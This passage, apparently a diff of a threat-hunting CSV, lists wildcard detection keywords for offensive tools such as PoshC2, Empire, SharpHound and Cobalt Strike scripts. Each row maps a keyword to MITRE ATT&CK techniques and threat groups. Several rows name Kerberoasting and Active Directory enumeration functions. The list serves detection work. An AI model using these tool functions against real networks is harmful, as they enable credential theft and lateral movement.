TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-DomainAdmins.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" 
"*Get-DomainComputer -TrustedToAuth | select name","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DomainForeignGroupMember*","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getdomainspnticket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*Get-DomainSPNTicket*","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1558 - T1208 - T1552","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*Get-DomainSPNTicket*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainSPNTicket*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - 